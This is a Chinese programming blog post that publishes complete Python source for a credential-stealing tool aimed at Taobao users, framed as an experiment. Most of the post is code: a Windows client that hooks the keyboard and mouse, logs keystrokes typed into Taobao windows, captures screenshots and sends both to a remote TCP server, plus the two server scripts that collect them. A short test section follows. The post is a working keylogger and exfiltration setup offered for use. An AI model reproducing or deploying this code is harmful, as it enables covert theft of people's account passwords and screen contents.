Python:通过远程监控用户输入来获取淘宝账号和密码的实验(二)

最新推荐文章于 2023-09-13 11:08:15 发布
最新推荐文章于 2023-09-13 11:08:15 发布
阅读量7.1k 收藏 10
点赞数 3
分类专栏: Python Linux 脚本语言 Python学习笔记 文章标签: python file tcp hook server 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyx1024/article/details/7315727
版权

  从今天早上产生了写个获取淘宝账号及密码的想法后,到现在,全天都在看书、调试程序,12小时内写了三篇相关博客,如下:

  《Python:通过获取淘宝账号和密码的实验,来看登陆方式选择的重要性》

  《Python:通过获取淘宝账号和密码的实验,来看登陆方式选择的重要性(二)》

  《Python:通过远程监控用户输入来获取淘宝账号和密码的实验(一)》

  刚刚把写完了最后一个功能,将用户机器上的抓的图片传送到监控者的服务器上,加之前面实现的各功能,完整程序代码如下:

一、代码:

 1、接收消息服务端(hook_server.py)

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import socket

def hook_tcp_server():
    '''
    Function:接收远程机器上发送过来的信息并输入出到终端
    Input:even
    Output: Ture
    author: socrates
    blog:http://blog.csdn.net/dyx1024
    date:2012-03-03
    '''        
    
    host = '192.168.1.101'
    port = 34586
    buf_size = 1024
    addr =(host, port)
    
    tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcp_server_socket.bind(addr)
    tcp_server_socket.listen(5)
    
    print 'waiting for connectiong...'
    while True:
        tcp_client_socket, addr = tcp_server_socket.accept()
        print 'connected from :', addr
        while True:
            msg = tcp_client_socket.recv(buf_size)
            print msg
            if not msg:
                break
        tcp_client_socket.close()
    tcp_server_socket.close()
    
if __name__ == '__main__':
    hook_tcp_server()

2、接收图片的服务器端(hook_pic_server.py) 

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import socket
import struct
import time

def hook_pic_file_server():
    '''
    Function:接收远程机器上发送过来的图片并保存到本地
    Input:even
    Output: Ture
    author: socrates
    blog:http://blog.csdn.net/dyx1024
    date:2012-03-03
    '''        
    
    host = '192.168.1.101'
    port = 34587
    buf_size = 1024
    addr =(host, port)
    pic_file_size_info = struct.calcsize('128s32sI8s')
    
    tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcp_server_socket.bind(addr)
    tcp_server_socket.listen(5)
    
    print 'waiting for connectiong...'
    while True:
        tcp_client_socket, addr = tcp_server_socket.accept()
        print 'connected from :', addr

        pic_file_head = tcp_client_socket.recv(pic_file_size_info)
        
        #接收文件头信息    
        pic_file_name, temp1, pic_file_size, temp2 = struct.unpack('128s32sI8s', pic_file_head)
        local_pic_dir = pic_file_name.strip('\0') 
        
         #接收文件内容
        pic_fobj = open(local_pic_dir, 'wb')
        temp_file_size = pic_file_size
        while True:
            if temp_file_size > buf_size:
                pic_file_data = tcp_client_socket.recv(buf_size)
            else:
                pic_file_data = tcp_client_socket.recv(temp_file_size)
                
            if pic_file_data:
                pic_fobj.write(pic_file_data)
                temp_file_size -= len(pic_file_data)
            if temp_file_size == 0:
                       break
        pic_fobj.close()
        print time.strftime('[%Y-%m-%d %H:%M:%S]: ',time.localtime(time.time()))+ local_pic_dir + ' was received'
              
        tcp_client_socket.close()   
    tcp_server_socket.close()

if __name__ == '__main__':
    hook_pic_file_server()

3、客户端(hook_client.py) 

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import pythoncom
import pyHook
import time
from PIL import ImageGrab
import socket
import struct
import os


def send_msg_to_remote(msg):
    '''
    Function:向远程服务器发送信息
    Input:even
    Output: Ture
    author: socrates
    blog:http://blog.csdn.net/dyx1024
    date:2012-03-03
    '''    
    host = '192.168.1.101'
    port = 34586
    buf_size = 1024
    addr =(host, port)
    
    if len(msg) != 0:
        tcp_client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            tcp_client_sock.connect(addr)
        except IOError, e:
            print ('Error:%s' % e.args[0])
            tcp_client_sock.close()
            
        data = time.strftime('[%Y-%m-%d %H:%M:%S]',time.localtime(time.time()))
        tip_info = data + 'from ' + socket.gethostname() + ':'
        tcp_client_sock.sendall(tip_info + msg)
        
        tcp_client_sock.close()

def send_pic_file_to_remote(pic_file_name):
    '''
    Function:向远程服务器发送图片
    Input:even
    Output: Ture
    author: socrates
    blog:http://blog.csdn.net/dyx1024
    date:2012-03-03
    '''     
    host = '192.168.1.101'  
    port = 34587
    buf_size = 1024
    addr =(host, port)  
    pic_file_size = struct.calcsize('128s32sI8s')
    
    pic_client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        pic_client_socket.connect(addr)
    except IOError, e:
        print ('Error:%s' % e.args[0])
        pic_client_socket.close()   
    
    pic_file_head = struct.pack('128s11I', pic_file_name, 0, 0, 0, 0, 0, 0, 0, 0, os.stat(pic_file_name).st_size, 0, 0)
    
    #发送文件信息
    pic_client_socket.send(pic_file_head)
    
    #发送文件内容
    pic_fobj = open(pic_file_name, 'rb')
    while True:
        file_data = pic_fobj.read(buf_size)
        if not file_data:
            break
        pic_client_socket.send(file_data)
    pic_fobj.close()
    
    pic_client_socket.close()
    
    
def onMouseEvent(event):
    '''
    Function:处理鼠标左键单击事件,如果当前MSG中存放了信息,
                                 将其写入文件,因为有的用户在输入 完用户名后,不是使用TAB键切换到密码
                                 框,而是通过鼠标切换到密码输入窗口这种情况应该属于大多数网民的习惯,
                                 所以此处要判断是否通过鼠标切换了输入窗口
    Input:even
    Output: Ture
    author: socrates
    blog:http://blog.csdn.net/dyx1024
    date:2012-03-03
    '''
    global MSG
    if len(MSG) != 0:
        #屏幕抓图实现
        pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
        pic = ImageGrab.grab()
            
        pic_file_name = '%s.png' % pic_name
        pic.save(pic_file_name) 
              
        #向服务器发送文字
        send_msg_to_remote(MSG)
        MSG = ''       
        
        #向服务器发送图片
        send_pic_file_to_remote(pic_file_name)
        
        #删除本地保存的图片
        os.remove(pic_file_name)
        

        
    return True
        

def onKeyboardEvent(event): 
    "处理键盘事件"  
    '''
    Function:处理键盘事件,如果当前窗口为TAOBAO页面,刚开始监控并记录用户输入
                                   因为此时用户可能准备输入用户名及密码进行登陆,所以将用户输入的所有可见
                                 的ascii字符记录下来,此处要考虑用户是否使用了TAB键或回车键来
                                结束输入,此时要将信息发送给远程服务器。
    Input:even
    Output: Ture
    author: socrates
    blog:http://blog.csdn.net/dyx1024
    date:2012-03-03
    '''     
    global MSG
    if event.WindowName.decode('GBK').find(u"淘宝") != -1:
        if (127 >= event.Ascii > 31) or (event.Ascii == 8):
            MSG += chr(event.Ascii)       
        if (event.Ascii == 9) or (event.Ascii == 13):
 
            #屏幕抓图实现
            pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
            pic = ImageGrab.grab()
            
            pic_file_name = '%s.png' % pic_name
            pic.save(pic_file_name)
                       
            #向服务器发送文字
            send_msg_to_remote(MSG)
            MSG = '' 
        

        
            #向服务器发送图片
            send_pic_file_to_remote(pic_file_name)
        
            #删除本地保存的图片
            os.remove(pic_file_name)
            
    return True


if __name__ == "__main__": 
    '''
    Function:获取TAOBAO账号及密码,增加抓图功能
    Input:NONE
    Output: NONE
    author: socrates
    blog:http://blog.csdn.net/dyx1024
    date:2012-03-03
    '''  
    MSG = ''   

    #创建hook句柄
    hm = pyHook.HookManager()

    #监控鼠标
    hm.SubscribeMouseLeftDown(onMouseEvent)
    hm.HookMouse()
    
    #监控键盘
    hm.KeyDown = onKeyboardEvent
    hm.HookKeyboard()

    #循环获取消息
    pythoncom.PumpMessages()


二、测试:

 1、环境信息:

           服务端:

               消息接收脚本hook_server.py运行于Unbutu上(IP:192.168.1.101,监听端口:34586)

       图片接收脚本hook_pic_server.py运行于Unbutu上(IP:192.168.1.101,监听端口:34587)


           客户端:

              脚本hook_client.py运行于Windows xp上(主机名:winxp-duanyx)

  2.、实测:

   a、 用户在淘宝上操作之后,查看服务器端shell窗口,有如下信息打印,见下图:

      

b、查看收到的图片文件:



c、查看linux上收到的文件图片:



  

socrates
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
Python 实现远程监控中心
人人都懂物联网
01-17 5636
设计 项目名称:LinuxMM 监控平台:Linux 使用模块:psutil、Paramiko 前端框架:Bootstrap 后端框架:DJango 监控方式 远程读取信息的方式一般分两种 推式:在每台主机上部署获取信息的脚本,然后采用某种方式发送给监控机。 优点: 缺点: 拉式:脚本只部署在监控机上,主动从目标主机上读取信息。 优点:代码只存放在监控机即可 缺点:每次都要发送执行命令;...
python基础教程:python输入错误密码用户锁定实现方法
12-22
小编给大家带来了用python实现用户多次密码输入错误后,用户锁定的实现方式,以及具体的流程,让大家更好的理解运行的过程。 1.新建一个文件,用以存放白名单用户(正确注册的用户 格式:username:password),再建...
python编写远程控制程序
qq_33163046的博客
12-03 5938
远程控制是网络安全的一个极为重要的内容,无论是网络安全的维护者还是破坏者都会对此进行研究。维护者的目标是保证远程控制的安全,而破坏者的目标是希望能够凭借各种手段实现对目标设备的远程控制。 本文主要研究三个内容。1.如何编写一个基于SSH的远程控制程序。2.如何编写一个socket实现的远程控制程序的服务端和客户端。3.如何编写一个socket实现的反向的远程控制程序(木马)。
Python实现远程控制另一台电脑
sunny
08-18 1590
Python中,我们可以使用一些库来实现远程控制另一台电脑。通过这些库,我们可以在本地电脑上执行命令,从而远程控制另一台电脑。- 在处理用户输入时,需要考虑到可能的安全问题,例如SQL注入、XSS攻击等。在这个示例中,我们将远程登录到另一台电脑,并执行一个简单的命令。- 在远程执行命令时,可能会遇到网络问题,例如连接超时、断开等。- 在使用这些库时,需要确保你有远程电脑的访问权限,并且知道用户名和密码。- 在执行命令时,需要确保命令是安全的,不会对系统造成破坏。
python】用 Python 远程控制 Windows 服务器,简直太方便了~
最新发布
bagell的博客
09-13 1676
除了可以远程查看 Windows 的文件外,还可以执行 bat 批处理文件,又或者是模拟命令行输入,根据返回值进行其他骚操作我已经将文中全部代码上传CSDN,文末获取完整源码。
Python手把手实现远程控制桌面
AI科技大本营
03-05 6123
作者 |李秋键责编 | 寇雪芹头图 | 下载于视觉中国引言:本项目旨在让大家理解远控软件的原理,通过远控桌面可以实现远程控制我们的电脑,更好更方便的管理电脑。文末将给出初始版的完整代码,...
Python-Rootkit:Python远程管理工具(RAT)来获取Meterpreter会话
02-05
python-rootkit 这是一个完全无法检测的python RAT,可以绕过几乎所有防病毒程序并在任何Windows机器内打开后门,这将建立与监听机器的反向https Metasploit连接。 ViRu5生命周期 绕过所有防病毒软件。 将malicius...
python监控键盘输入实例代码
09-20
主要介绍了python监控键盘输入实例代码,分享了相关代码示例,小编觉得还是挺不错的,具有一定借鉴价值,需要的朋友可以参考下
详解用Python实现自动化监控远程服务器
01-01
最近发现Python课器做很多事情,在监控服务器有其独特的优势,耗费资源少,开发周期短。 首先我们做一个定时或者实时脚本timedtask.py,让其定时监控目标服务器,两种方式: 第一种: #!/usr/bin/env python # -*- ...
【基于python远程控制的实现】
qq_47791770的博客
12-20 897
基于python远程控制的实现学习
python实现远程服务器的操作
MXB_1220的博客
07-25 757
通过小小的例子简单的介绍了paramiko如何对文件上传下载和执行linux的命令操作。对于我们测试来言,无论是日常测试中,还是在编写自动化中,又遇到需要服务器操作的时候,都可以尝试下,一来可以在领导面前稳稳的装一波,来也可以增加我们对python知识的提高。!!我个人整理了我这几年软件测试生涯整理的一些技术资料,包含:电子书,简历模块,各种工作模板,面试宝典,自学项目等。欢迎大家点击下方名片免费领取,千万不要错过哦。
Python远程控制linux,实现Xshell效果
m0_65544268的博客
05-13 774
ssh是一个协议,OpenSSH是其中一个开源实现,paramiko是Python的一个库,实现了SSHv2协议(底层使用cryptography)。有了Paramiko以后,我们就可以在Python代码中直接使用SSH协议对远程服务器执行操作,而不是通过ssh命令对远程服务器进行操作。
python远控
qq_51651901的博客
11-14 1071
python基于socket所编写的远控
Python实现自动化监控远程服务器
热门推荐
代码帮
06-14 2万+
最近发现Python课器做很多事情,在监控服务器有其独特的优势,耗费资源少,开发周期短。 首先我们做一个定时或者实时脚本timedtask.py,让其定时监控目标服务器,两种方式: 第一种: #!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2017/11/27 15:59 # @Desc : 定时任务,以需要的时间...
使用python制作一个简易的远控终端
T1ngSh0w的博客
03-27 1849
python制作一个简易的远控终端: 可以通过自己制作了解远控程序的原理。由于CS跟MSF生成的后门程序特征比较明显,很多杀毒软件都会杀掉,即使没有杀掉,两三天以后也可能被杀软杀掉,不能做到一个持续化的权限获取,也就是权限维持。而我们自己制作后门程序,是我们自己写的,并没有被公开,杀软就匹配不到我们的特征值,这样杀软就不会杀掉我们的后门程序。如果我们再将我们的后门名称改为系统文件的名称,再改变图标,把后门程序添加到计划任务中,这样我们就可以做到一个很好的一个权限维持。 将python文件打包成exe文件。
利用Python编写远程控制程序
qq_63565161的博客
04-07 1544
正向连接脚本实际上受到目标设备IP的限制,所以出现了一种更有效的木马。反向木马的被控端写有主控端的IP地址,一但在目标设备上运行,就会主动通知主控端,然后再从主控端发送命令。目标设备上可能没有python环境,所以有时候需要改变一下文件类型。-D 默认选项,创建一个目录,包含exe文件和大量依赖文件。使用 pyinstaller xxx.py(文件路径)-p 添加搜索路径,让其找到对应的库。-i 改变生成程序的icon图标。-F 打包后生成单个exe文件。-c 默认使用控制台(黑框框)
python编写一个远程控制程序
YeD666的博客
03-29 7847
基于SSH的远程控制程序 远程控制程序分为正向控制和反向控制。简单理解,正向控制,我们是客户端,去连接一个开放远程服务的服务器。反向控制我们在自己的电脑上搭建远程控制服务器,连接我们服务器的客户将会被我们控制。现在的攻击多采用反向控制 基于paramiko实现ssh客户端 pip安装paramiko python3 -m pip install paramiko paramiko是一个用ssh实现远程控制的python模块,其中封装了ssh的各种功能,两个重要的连接函数SSHClinet()实现
Python开发学习之Python实现用手机监控远程控制电脑
xuezhangmen的博客
12-13 1098
很多时候,我们都有远程控制电脑的需求。比如正在某样东西,需要让电脑在完后关机。或者你需要监控一个程序的运行状况等。今天我们就来用Python实现一个远程监控并控制电脑的小程序。实现原理听起来远程控制电脑好像很高级的样子,但是实现起来其实非常简单。实现原理如下:运行程序,让程序不停地读取邮件用手机给电脑发送邮件判断是否读取到指定主题的邮件,如果有,则获取邮件内容根据邮件内容,执行预设的函数与其说是学习如何远程控制电脑,还不如说是学习如何读取邮件。
python远程监控脚本:使用paramiko和psutil监控远程机器的cpu、内存、磁盘、网络使用情况
qq_44212783的博客
07-28 2969
使用python监控远程机器的cpu、内存、磁盘、网络使用情况
python模拟用户输入账号密码进行存储的过程:
05-25
可以使用Python中的input函数来获取用户输入账号密码,然后将其存储到文件中。以下是一个简单的示例代码: ``` # 获取用户输入账号密码 username = input("请输入账号:") password = input("请输入密码:") # 将账号密码存储到文件中 with open("user.txt", "w") as f: f.write(username + "\n") f.write(password) ``` 在上面的代码中,我们首先使用input函数获取用户输入账号密码,然后使用with语句打开一个文件,并将账号密码写入到该文件中。注意,在写入账号密码时,我们在每个字符串末尾都加了一个换行符"\n",这是为了在读取文件时更方便地分离账号密码。 如果需要读取已存储的账号密码,可以使用以下代码: ``` # 从文件中读取账号密码 with open("user.txt", "r") as f: username = f.readline().strip() password = f.readline().strip() # 输出账号密码 print("账号:", username) print("密码:", password) ``` 在上面的代码中,我们首先使用with语句打开文件,并使用readline函数分别读取账号密码。需要注意的是,readline函数返回的字符串末尾包含一个换行符"\n",因此我们需要使用strip函数将其去除。最后,我们将读取到的账号密码输出到控制台。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值